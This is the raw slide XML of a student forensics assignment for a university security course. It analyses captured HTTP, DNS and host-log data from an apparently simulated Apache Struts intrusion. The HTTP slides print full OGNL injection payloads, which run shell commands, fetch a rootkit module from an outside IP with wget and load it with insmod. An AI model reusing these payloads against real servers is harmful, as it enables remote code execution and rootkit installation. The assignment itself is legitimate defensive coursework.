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8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62.212.156.148/rk.k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3 Checkpoint 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ECE/CS 498DS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Spring 2020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 Patke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (apetke), Haoran Qiu (haoranq4),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Haoming Lu (hl36), Erik Pan (zp3)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DNS Traffic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36326"/>
            <a:ext cx="89058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altLang="zh-CN" dirty="0"/>
              <a:t>a) Provide the IP address of the attacker-controlled DNS server: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>162.212.156.148</a:t>
            </a:r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838199" y="2403734"/>
            <a:ext cx="1060438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(b)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Provide the IP address of the legitimate DNS server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>75.75.75.75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576" y="3244334"/>
            <a:ext cx="46583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Distribution plot of the length of DNS queries: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84850" y="3048635"/>
            <a:ext cx="56578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89" y="197024"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task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2587"/>
            <a:ext cx="955089" cy="554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789" y="1441810"/>
            <a:ext cx="979377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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0.6.(a) Which http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file represents legitimate activity, and which represents attacker activity?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legitimate: http2.pcap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0.6.(b) Are there any Content-Type headers in legitimate activity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file? If there are, list those Content-Type headers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No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HTTP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7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dirty="0"/>
              <a:t>Task 1. 1. a Report the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>UNIX timestamp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>of the first attempted scan on the vulnerable server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>1521394903.610774</a:t>
            </a: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Task 1. 1.b W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>of the vulnerable server?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>172.17.0.2</a:t>
            </a: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Task 1. 1.c What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> of the vulnerable server?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>8080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313656"/>
            <a:ext cx="10515600" cy="56673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2.a Provide a list of the Content-Type headers sent to the vulnerable server from the provided HTTP packet capture. For each Content-Type header, provide its length as well.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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959962"/>
            <a:ext cx="12117936" cy="377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#0 .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)} length: 144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#1 .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)} length: 144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#2 .multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)} length: 144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#3 application/x-www-form-urlencoded length: 33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#4 application/x-www-form-urlencoded length: 33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#5 application/x-www-form-urlencoded length: 33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#6 application/x-www-form-urlencoded length: 33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7 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 806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8 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 810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9 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget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 Unicode MS"/>
                <a:ea typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://162.212.156.148/rk.ko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&gt; rk.ko').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 845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10 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget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latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://162.212.156.148/rk.ko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&gt; rk.ko').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 845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11 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='insmod rk.ko.1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 818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#12 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='insmod rk.ko.1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 818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#13 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='insmod rk.ko.1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} length: 818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US" dirty="0"/>
              <a:t>Task 1 – HTTP Traffic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66737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2.b Fill in the blanks in the table below</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400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803400" y="2117724"/>
          <a:ext cx="8127999" cy="4544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0"/>
                <a:gridCol w="2133600"/>
                <a:gridCol w="4273549"/>
              </a:tblGrid>
              <a:tr h="772209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Command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 in the attack?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 of the command</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc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whoami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Displays the name of the current user</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>wget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  <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>on-interactive download of files from the Web</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>ls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Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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information about the FILEs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>cat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No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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  <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>cd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  <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>insmod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Insert a module into the kernel</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>ssh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No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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  <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1"/>
                        <a:t>lsmod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No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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699" y="1531551"/>
            <a:ext cx="8905875" cy="256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1.a Provide a list of kernel modules added or removed from the system:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added: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{'ttm', 'br_netfilter', 'bridge', 'vboxvideo', 'snd_ac97_codec', 'nf_conntrack_ipv4', 'crc32_pclmul', 'lrw', 'rk', 'iptable_nat', 'nf_defrag_ipv4', 'veth', 'ufs', 'floppy', 'minix', 'hfsplus', 'snd_pcm', 'parport_pc', 'msdos', 'ntfs', 'ip_tables', 'nf_conntrack_netlink', 'xor', 'hid_generic', 'cryptd', 'autofs4', 'raid6_pq', 'nf_nat_ipv4', 'nf_nat_masquerade_ipv4', 'libahci', 'soundcore', 'xt_nat', 'joydev', 'parport', 'x_tables', 'nfnetlink', 'xt_tcpudp', 'bluetooth', 'aes_x86_64', 'i2c_piix4', 'usbhid', 'qnx4', 'iptable_filter', 'input_leds', 'hid', 'xt_addrtype', 'crct10dif_pclmul', 'llc', 'glue_helper', 'sysfillrect', 'ac97_bus', 'nfnetlink_log', 'nf_conntrack', 'xfrm_algo', 'e1000', 'btrfs', 'psmouse', 'drm', 'gf128mul', 'snd_intel8x0', 'vboxguest', 'nfnetlink_queue', 'xfrm_user', 'overlay', 'pata_acpi', 'jfs', '8250_fintek', 'ghash_clmulni_intel', 'snd', 'video', 'fb_sys_fops', 'ipt_MASQUERADE', 'xt_conntrack', 'mac_hid', 'snd_timer', 'drm_kms_helper', 'ppdev', 'ablk_helper', 'intel_powerclamp', 'nf_nat', 'xfs', 'sysimgblt', 'libcrc32c', 'stp', 'ahci', 'hfs', 'aesni_intel', 'syscopyarea', 'fjes', 'serio_raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="105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’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}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> 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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Removed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>{'overlay', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>xt_addrtype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jfs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br_netfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'bridge', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>llc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ipt_MASQUERADE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xt_conntrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'raid6_pq', 'nf_conntrack_ipv4', 'nf_nat_ipv4', 'nf_nat_masquerade_ipv4', 'rk', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>iptable_nat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nf_conntrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'nf_defrag_ipv4', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>ppdev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xt_nat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xfrm_algo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veth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nf_nat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ufs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'floppy', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>minix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btrfs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hfsplus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xfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'libcrc32c', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>msdos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x_tables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nfnetlink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ntfs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ip_tables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stp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xt_tcpudp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nf_conntrack_netlink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xfrm_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', 'qnx4', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>xor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hfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>iptable_filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>'}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7699" y="4398576"/>
            <a:ext cx="8905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1.b What is the attacker-controlled kernel module?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rk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Host Logs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699" y="1531551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1.c How did you verify that the module was loaded onto the server?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58670"/>
            <a:ext cx="100869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699" y="1546156"/>
            <a:ext cx="890587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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that contains the internal hostnames?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>known_hosts and other related files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>{'/root/.ssh/.known_hosts.swp',</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> '/root/.ssh/.known_hosts.swpx',</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> '/root/.ssh/known_hosts',</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> '/root/.ssh/known_hosts~'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – Host Logs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325" y="1522026"/>
            <a:ext cx="10106025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Do you observe any evidence that the attacker extracted the internal host names via HTTP in the logs? (If yes, report the log line. If not, briefly explain why not. )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touched, no timestamp recorded, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; Attacker only using DEFAULT_MEMBER_ACCESS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there is, there will be HTTP packets containing the key word </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“known_host” but there's none.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It's also possible the attacker is using internal DNS server to get</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this.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7150" y="2087008"/>
            <a:ext cx="3718870" cy="4405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10565</Words>
  <Application>WPS Presentation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Courier New</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Mini-Project 3 Checkpoint 1 ECE/CS 498DS Spring 2020</vt:lpstr>
      <vt:lpstr>Task 0</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – DNS Traffic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HAORAN</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-30T21:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-14T02:21:30Z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